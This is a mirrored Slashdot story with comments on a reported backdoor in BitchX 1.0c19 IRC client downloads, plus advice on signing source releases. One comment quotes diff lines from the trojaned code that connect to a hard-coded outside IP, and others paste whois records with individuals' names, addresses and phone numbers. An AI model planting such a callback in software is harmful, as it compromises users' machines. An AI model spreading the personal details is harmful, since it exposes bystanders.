Slashdot Mirror

← Back to Stories (view on slashdot.org)

BitchX 1.0c19 IRC Client Backdoored

Posted by michael on from the what-me-worry dept.

JRAC writes "A recent Bugtraq submission has indicated that the popular IRC client, BitchX, contains a backdoor. So far, only certain 1.0c19 files, downloaded from ftp.bitchx.com are reported to contain the malicious code. The BitchX developers have been notified, so hopefully a fix will be issued soon. Looks like irssi wasn't the only one ;)"

11 of 305 comments (clear)

  1. Who's this? by Draoi · · Score: 5, Informative
    There's an interesting IP address hard-coded into the trojaned code;

    + sa.sin_port = htons (6667);
    + sa.sin_addr.s_addr = inet_addr ("213.77.115.17"); alarm (10);
    Doing a reverse-DNS lookup gives;
    ;; QUERY SECTION:
    ;; 17.115.77.213.in-addr.arpa, type = ANY, class = IN

    ;; ANSWER SECTION:
    17.115.77.213.in-addr.arpa. 1H IN PTR wenus.dtcomsa.com.
    .... so who are they??
    --
    Alison

    "It is a miracle that curiosity survives formal education." - Albert Einstein

    1. Re:Who's this? by zdzichu · · Score: 4, Informative

      inetnum 213.77.115.0 - 213.77.115.255
      netname DATACOM
      descr Datacom
      descr Warszawa Bemowo
      country PL
      admin-c AW7760-RIPE
      tech-c RW7118-RIPE
      status ASSIGNED PA
      mnt-by AS5617-MNT
      changed tkielb@cst.tpsa.pl 20000915
      source RIPE

      (stupidly formatted because of lamefilter)

      --
      :wq
    2. Re:Who's this? by Anonymous Coward · · Score: 1, Informative

      It's hardly likely to be the owners of that machine that wrote the backdoor. That IP is likely to be somebody elses machine that's been compromised and used by the backdoor creators.

    3. Re:Who's this? by Neil+Watson · · Score: 5, Informative
      PL is Poland.

      [nwatson@valetta ~]$whois 213.77.115.17
      % This is the RIPE Whois server.
      % The objects are in RPSL format.
      % Please visit http://www.ripe.net/rpsl for more information.
      % Rights restricted by copyright.
      % See http://www.ripe.net/ripencc/pub-services/db/copyri ght.html

      inetnum: 213.77.115.0 - 213.77.115.255
      netname: DATACOM
      descr: Datacom
      descr: Warszawa Bemowo
      country: PL
      admin-c: AW7760-RIPE
      tech-c: RW7118-RIPE
      status: ASSIGNED PA
      mnt-by: AS5617-MNT
      changed: tkielb@cst.tpsa.pl 20000915
      source: RIPE

      route: 213.77.0.0/16
      descr: TPNET (PL)
      descr: Provider Local Registry
      origin: AS5617
      notify: konradpl@zt.piotrkow.tpsa.pl
      mnt-by: AS5617-MNT
      changed: konradpl@zt.piotrkow.tpsa.pl 20000728
      source: RIPE

      person: Arkadiusz Wrobel
      address: "DataCOM" S. A.
      address: ul Radiowa 21a m20
      address: 01 - 485 Warszawa
      address: POLAND
      phone: +48 606 298639
      fax-no: +48 22 6672495
      e-mail: awrobel@wat.waw.pl
      nic-hdl: AW7760-RIPE
      mnt-by: AS5617-MNT
      changed: tkielb@cst.tpsa.pl 20000915
      source: RIPE

      person: Rafal Wrzosek
      address: "DataCOM" S. A.
      address: ul Kaliskiego 11a /312
      address: 01 - 485 Warszawa
      address: POLAND
      phone: +48 606 145187
      fax-no: +48 22 6672495
      e-mail: awrobel@wat.waw.pl
      nic-hdl: RW7118-RIPE
      mnt-by: AS5617-MNT
      changed: tkielb@cst.tpsa.pl 20000915
      source: RIPE

      Yes, someone has most likely compromised the box and is using it for the backdoor. However, the owners of the box are still responsible for the lack of security that allowed their box to be compromised.

      --
      UNIX/Linux Consulting
  2. Re:The name.... by RealisticWeb.com · · Score: 3, Informative

    Your not alone by far. My computer (yes even my Linux box) is a family computer, and I refuse to use any software with names or content that is not appropriate for my children to see. Keep in mind that what is "appropriate" is totaly my opinion, and some people would argue with me, but my quesition is: why is this only ever an issue with open source software?

    --
    Sigs are out of style, so I'm not going to use one...oh wait..
  3. Digitally sign your sources... by Cyclops · · Score: 5, Informative

    Many don't digitally sign their sources with a secure key, and thus there is absolutely no way to verify that those sources are the ones the developer intended to release.

    Many think that a simple md5sum alongside the sources is enough. IT IS NOT. Any attacker who replaces the sources can as easily replace the md5sum, which can be generated by anyone.

    A digital signature (I suggest using gpg) can only be generated by YOU if you keep it in a secure place, and use it to sign the sources. The public side of this key should be widely distributed and preferably signed (that is recognized) by third parties... the most trustworthy these third parties can be, the better.

    After the huge attack on the network where such sites as Apache were hosted, other Apache projects which did not sign their packages suddenly started signing them. They got scared. You should be too.

    A lot of people instinctively trust their dns resolutions (oops) and also think that if they go to http://www.mozilla.org they will get their favorite browser for sure. They are also wrong. dns can be spoofed under certain conditions, so they could be going to crackersR.us instead, and downloading a neat trojaned source, for instance.

    The more a project grows in fame, the more it will become a likely target for these kinds of attacks, so the more need to a degree of responsability that should not be needed, but it unfourtunately is since the danger is ubiquitous.

    Be carefull, be very carefull.

    Also avoid using user root period.

  4. Re:GNU/Linux needs signed downloads by bogado · · Score: 3, Informative

    RPM does this, and most rpm managers do exactly this (red-carpet for instance). I bet debian has the same type of protection. If you only install software from trusted distributors, you should be fine.

    --
    []'s Victor Bogado da Silva Lins

    ^[:wq

  5. Re:XSS in Slashcode by jamie · · Score: 4, Informative

    This post is quite inaccurate and we will be responding, also on bugtraq, momentarily. The author of the post did not contact the Slash development team, or we could have corrected some of his misconceptions.

  6. Re:It's Odd by frozenray · · Score: 3, Informative

    A user named uid0 made an excellent point in an usenet thread about the backdoored dsniff/fragroute/fragrouter utilities on monkey.org:

    This makes one wonder a question that would be best posed to the community; the purpose of MD5/SHA/etc is to provide unequivocal evidence as to the validity of a piece of data. More often than not, such files are kept in the same, vulnerable, location as the actual data. Clearly one can see the downfall of such a system.

    (source)

    --
    "There are already a million monkeys on a million typewriters, and Usenet is NOTHING like Shakespeare." - Blair Houghton
  7. Re:The name.... by bmetzler · · Score: 3, Informative

    It's not really that much of an issue. It would be trivial to go into the BitchX source code, edit the PROGNAME definition, or whatever the equivilent, and make yourself a nice new IRC client named whatever you want.

    Yes it is. Unless they've made major changes to the code recently. I tried to patching the code base about a year ago and make a censored version, but the program name is hardcoded in a million places. And once you do find and replace everything, you still have the problem of creating a new patch everytime a new version is released.

    -Brent

  8. GNU/Linux HAS signed downloads by Nailer · · Score: 3, Informative

    RPM, the standard packaging system according to the Linux Standards base, had support for PGP (IIRC) around three years ago. This was replaced / upgraded to GPG a couple of years ago. Every package in Red Hat Linux (and most other popular distros) is signed (unless someone screws up - there was a case where 2 packages weren't properly signed, but signed replacements were made avaliable soon after). RPM will print a strong warning if the signature isn't correct (and maybe fail the operation - dunno, my signature's have always been correct).

    Dpkg also recently added GPG support, buy you have to trust individuals rather than a specific company - no packager is going to lose their job if they're working in Albania on Debian trojaning packages.